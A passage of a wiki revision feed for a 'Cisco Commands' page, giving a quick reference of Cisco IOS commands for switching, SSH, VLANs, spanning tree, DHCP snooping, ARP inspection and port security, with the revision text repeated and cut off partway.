&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief | exclude unassigned&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Routing Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip route&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN &amp;amp; Switching ==&lt;br /&gt;
&lt;br /&gt;
=== Show VLANs ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show vlan brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface VLAN Details ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show interface g0/1 switchport&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Trunk Interfaces ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show int trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Clear Tables ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
clear mac address-table&lt;br /&gt;
clear arp-cache&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Telnet &amp;amp; Remote Access ==&lt;br /&gt;
&lt;br /&gt;
=== Connect via Telnet ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
connect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Hosts &amp;amp; Sessions ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show hosts&lt;br /&gt;
show sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disconnect Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disconnect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Suspend Active Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Ctrl+Shift+6, then x&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== SSH Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Basic SSH Setup ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip domain-name cisco.com&lt;br /&gt;
crypto key generate rsa&lt;br /&gt;
ip ssh version 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove RSA Keys ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
crypto key zeroize rsa&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Create Local User ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
username admin secret ccna&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Default Gateway ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip default-gateway 192.168.10.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH on VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Global Configuration Mode ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Global Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
configure terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disable DNS Lookup on Typos ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ip domain-lookup&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set MOTD Banner ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
banner motd MESSAGEHERE&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Hostname ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
hostname HOSTNAME&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Line Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Console Line ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line con 0&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Interface Selection ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface vlan 1&lt;br /&gt;
interface fa0/1&lt;br /&gt;
interface range fa0/2-3&lt;br /&gt;
interface range fa0/2-3,g0/1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable Interface ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create / Configure VLAN ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vlan 10&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Switchport Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Access Port ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport mode access&lt;br /&gt;
switchport access vlan 10&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Trunk Port ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport trunk encapsulation dot1q&lt;br /&gt;
switchport mode trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Trunk VLAN Settings ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
switchport trunk native vlan 99&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== IPv6 Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv6 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign Link-Local Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address fe80::1 link-local&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove IPv6 Addresses ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
no ipv6 address&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== IPv6 ND Other-Config Flag ===&lt;br /&gt;
The `ipv6 nd other-config-flag` command sets the &amp;quot;Other Configuration&amp;quot; flag in IPv6 Neighbor Discovery (ND) messages.  &lt;br /&gt;
- When enabled, it signals to IPv6 hosts that they should obtain additional configuration information (such as DNS server addresses) via DHCPv6, even if they have a stateless autoconfigured address.&lt;br /&gt;
&lt;br /&gt;
 ipv6 nd other-config-flag&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Spanning Tree ==&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on an interface ===&lt;br /&gt;
Use PortFast on edge/access ports that connect to end devices.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast globally ===&lt;br /&gt;
Enables PortFast on all access ports.&lt;br /&gt;
&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
&lt;br /&gt;
=== Enable PortFast on a trunk (use with caution) ===&lt;br /&gt;
Only use when the trunk connects to a single end device (not another switch).&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast trunk&lt;br /&gt;
&lt;br /&gt;
=== Verify PortFast status ===&lt;br /&gt;
&lt;br /&gt;
 show spanning-tree interface GigabitEthernet0/1 detail&lt;br /&gt;
&lt;br /&gt;
=== Disable PortFast on an interface ===&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  no spanning-tree portfast&lt;br /&gt;
&lt;br /&gt;
=== Best Practice: Enable BPDU Guard with PortFast ===&lt;br /&gt;
Shuts down the port if a BPDU is received, protecting against loops.&lt;br /&gt;
&lt;br /&gt;
Per interface:&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  spanning-tree portfast&lt;br /&gt;
  spanning-tree bpduguard enable&lt;br /&gt;
&lt;br /&gt;
Globally:&lt;br /&gt;
 spanning-tree portfast default&lt;br /&gt;
 spanning-tree bpduguard default&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Do &#039;&#039;&#039;not&#039;&#039;&#039; enable PortFast on ports connected to other switches&lt;br /&gt;
* Recommended for access/edge ports&lt;br /&gt;
* Incorrect use can cause Layer 2 loops&lt;br /&gt;
&lt;br /&gt;
== DHCP Snooping ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping globally ===&lt;br /&gt;
Enable DHCP Snooping for the switch.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping&lt;br /&gt;
&lt;br /&gt;
=== Enable DHCP Snooping on a VLAN ===&lt;br /&gt;
DHCP Snooping only operates on specified VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip dhcp snooping vlan 10&lt;br /&gt;
 ip dhcp snooping vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Mark uplinks or ports connected to legitimate DHCP servers as trusted.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. DHCP server responses are blocked.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip dhcp snooping trust&lt;br /&gt;
&lt;br /&gt;
=== Configure DHCP Snooping rate limiting ===&lt;br /&gt;
Protect against DHCP starvation attacks. Limits to 15 DHCP packets per second, will mark port as violating otherwise.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip dhcp snooping limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DHCP Snooping status ===&lt;br /&gt;
&lt;br /&gt;
 show ip dhcp snooping&lt;br /&gt;
 show ip dhcp snooping binding&lt;br /&gt;
&lt;br /&gt;
=== Disable DHCP Snooping ===&lt;br /&gt;
&lt;br /&gt;
 no ip dhcp snooping&lt;br /&gt;
 no ip dhcp snooping vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Only trusted ports can send DHCP server messages&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly used with &#039;&#039;&#039;Dynamic ARP Inspection&#039;&#039;&#039; and &#039;&#039;&#039;IP Source Guard&#039;&#039;&#039;&lt;br /&gt;
* Requires correct VLAN configuration to function properly&lt;br /&gt;
&lt;br /&gt;
== Dynamic ARP Inspection (DAI) ==&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI globally ===&lt;br /&gt;
Dynamic ARP Inspection requires DHCP Snooping to be enabled.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection&lt;br /&gt;
&lt;br /&gt;
=== Enable DAI on a VLAN ===&lt;br /&gt;
Specify which VLANs should be protected.&lt;br /&gt;
&lt;br /&gt;
 ip arp inspection vlan 10&lt;br /&gt;
 ip arp inspection vlan 20&lt;br /&gt;
&lt;br /&gt;
=== Configure trusted interfaces ===&lt;br /&gt;
Trust uplinks and ports connected to other switches or routers.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
=== Untrusted interfaces (default) ===&lt;br /&gt;
Access ports are untrusted by default. Invalid ARP packets are dropped.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  no ip arp inspection trust&lt;br /&gt;
&lt;br /&gt;
=== Configure ARP rate limiting ===&lt;br /&gt;
Protect against ARP flooding attacks.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  ip arp inspection limit rate 15&lt;br /&gt;
&lt;br /&gt;
=== Verify DAI status ===&lt;br /&gt;
&lt;br /&gt;
 show ip arp inspection&lt;br /&gt;
 show ip arp inspection vlan&lt;br /&gt;
 show ip arp inspection interfaces&lt;br /&gt;
&lt;br /&gt;
=== Disable DAI ===&lt;br /&gt;
&lt;br /&gt;
 no ip arp inspection&lt;br /&gt;
 no ip arp inspection vlan 10&lt;br /&gt;
&lt;br /&gt;
=== Notes ===&lt;br /&gt;
* Requires &#039;&#039;&#039;DHCP Snooping&#039;&#039;&#039; to build the ARP binding table&lt;br /&gt;
* Only trusted ports can send unlimited ARP replies&lt;br /&gt;
* Access ports should remain untrusted&lt;br /&gt;
* Commonly deployed with &#039;&#039;&#039;PortFast + BPDU Guard&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
== Port Security ==&lt;br /&gt;
&lt;br /&gt;
=== Activate Port Security on an interface ===&lt;br /&gt;
The port cannot be a dynamic port:&lt;br /&gt;
 switchport mode access&lt;br /&gt;
Enable Port Security&lt;br /&gt;
 switchport port-security&lt;br /&gt;
&lt;br /&gt;
=== Set the maximum number of mac addresses that can be used on that port ===&lt;br /&gt;
 switchport port-security maximum 1&lt;br /&gt;
&lt;br /&gt;
=== Whitelist a specific mac address ===&lt;br /&gt;
 switchport port-security mac-address 0001.6311.E7BC&lt;br /&gt;
&lt;br /&gt;
=== Enable sticky mode to automatically learn mac addresses ===&lt;br /&gt;
 switchport port-security mac-address sticky&lt;br /&gt;
&lt;br /&gt;
=== Port Security Violation Modes ===&lt;br /&gt;
==== Protect ====&lt;br /&gt;
Silently drops packets from unknown MAC addresses while keeping the port up and generating no alerts.&lt;br /&gt;
 switchport port-security violation protect&lt;br /&gt;
&lt;br /&gt;
==== Restrict ====&lt;br /&gt;
Drops packets from unknown MAC addresses and logs the violation while incrementing the security counter.&lt;br /&gt;
 switchport port-security violation restrict&lt;br /&gt;
&lt;br /&gt;
==== Shutdown ====&lt;br /&gt;
Immediately disables the port when an unknown MAC address is detected, placing it into an error-disabled state.&lt;br /&gt;
 switchport port-security violation shutdown&lt;br /&gt;
&lt;br /&gt;
=== Port Security Aging ===&lt;br /&gt;
==== Enable static aging on an interface ====&lt;br /&gt;
 switchport port-security aging static&lt;br /&gt;
&lt;br /&gt;
==== Enable timed aging on an interface (5 minutes) ====&lt;br /&gt;
 switchport port-security aging time 5&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1071</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1071"/>
		<updated>2026-02-04T22:13:49Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* IPv6 ND Other-Config Flag */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Cisco IOS Command Reference =&lt;br /&gt;
&lt;br /&gt;
A quick-reference guide for common Cisco IOS commands on switches and routers.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== System &amp;amp; Routing Basics ==&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv4 Routing (Layer 3 Switches) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip routing&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv6 Routing (Routers) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 unicast-routing&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device &amp;amp; System Information ==&lt;br /&gt;
&lt;br /&gt;
=== Show MAC Address Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show mac address-table&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show OS and Device Version ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show version&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Logged-in Users ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show users&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Files ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dir&lt;br /&gt;
dir nvram:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Configuration Files ==&lt;br /&gt;
&lt;br /&gt;
=== Show Configurations ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show running-config&lt;br /&gt;
show startup-config&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run interface g0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Filter Running Config (grep-like) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run | include {searchterm}&lt;br /&gt;
show run | begin {searchterm}&lt;br /&gt;
show run | section {section-name}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Save Running Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
copy running-config startup-config&lt;br /&gt;
copy run start&lt;br /&gt;
wr&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== User Privileges &amp;amp; Security ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Privileged Mode ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Encrypted Enable Password ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
enable secret ThisisaSecret&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Encrypt Plaintext Passwords (Weak Encryption)  ===&lt;br /&gt;
You can decrypt these with publicly available tools like https://keydecryptor.com/decryption-tools/cisco7&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
service password-encryption&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface &amp;amp; Network Status ==&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief&lt;br /&gt;
show ipv6 interface brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Interface IP Summary (filtered to only interfaces with IPs) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip interface brief | exclude unassigned&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Routing Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show ip route&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN &amp;amp; Switching ==&lt;br /&gt;
&lt;br /&gt;
=== Show VLANs ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show vlan brief&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface VLAN Details ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show interface g0/1 switchport&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Trunk Interfaces ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show int trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Clear Tables ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
clear mac address-table&lt;br /&gt;
clear arp-cache&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Telnet &amp;amp; Remote Access ==&lt;br /&gt;
&lt;br /&gt;
=== Connect via Telnet ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
connect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Hosts &amp;amp; Sessions ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show hosts&lt;br /&gt;
show sessions&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disconnect Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
disconnect {DeviceName}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Suspend Active Session ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Ctrl+Shift+6, then x&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== SSH Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Basic SSH Setup ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip domain-name cisco.com&lt;br /&gt;
crypto key generate rsa&lt;br /&gt;
ip ssh version 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove RSA Keys ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
crypto key zeroize rsa&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Create Local User ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
username admin secret ccna&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Default Gateway ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip default-gateway 192.168.10.1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable SSH on VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 transport input ssh&lt;br /&gt;
 login local&lt;br /&gt;
 exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Global Configuration Mode ==&lt;br /&gt;
&lt;br /&gt;
=== Enter Global Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
configure terminal&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Disable DNS Lookup on Typos ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no ip domain-lookup&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set MOTD Banner ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
banner motd MESSAGEHERE&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Set Hostname ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
hostname HOSTNAME&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Line Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Console Line ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line con 0&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== VTY Lines ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
line vty 0 15&lt;br /&gt;
 password itsasecret&lt;br /&gt;
 login&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Interface Selection ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
interface vlan 1&lt;br /&gt;
interface fa0/1&lt;br /&gt;
interface range fa0/2-3&lt;br /&gt;
interface range fa0/2-3,g0/1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable Interface ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
no shutdown&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv4 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip address 192.168.0.1 255.255.255.0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== VLAN Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Create / Configure VLAN ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
vlan 10&lt;br /&gt;
 name MyAwesomeVlan&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Switchport Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Access Port ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport mode access&lt;br /&gt;
switchport access vlan 10&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Trunk Port ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport trunk encapsulation dot1q&lt;br /&gt;
switchport mode trunk&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Trunk VLAN Settings ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
switchport trunk allowed vlan 10,20,33,99&lt;br /&gt;
switchport trunk native vlan 99&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== IPv6 Interface Configuration ==&lt;br /&gt;
&lt;br /&gt;
=== Assign IPv6 Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address 2001:DB8:CAFE:1::1/64&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Assign Link-Local Address ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 address fe80::1 link-local&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Remove IPv6 Addresses ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
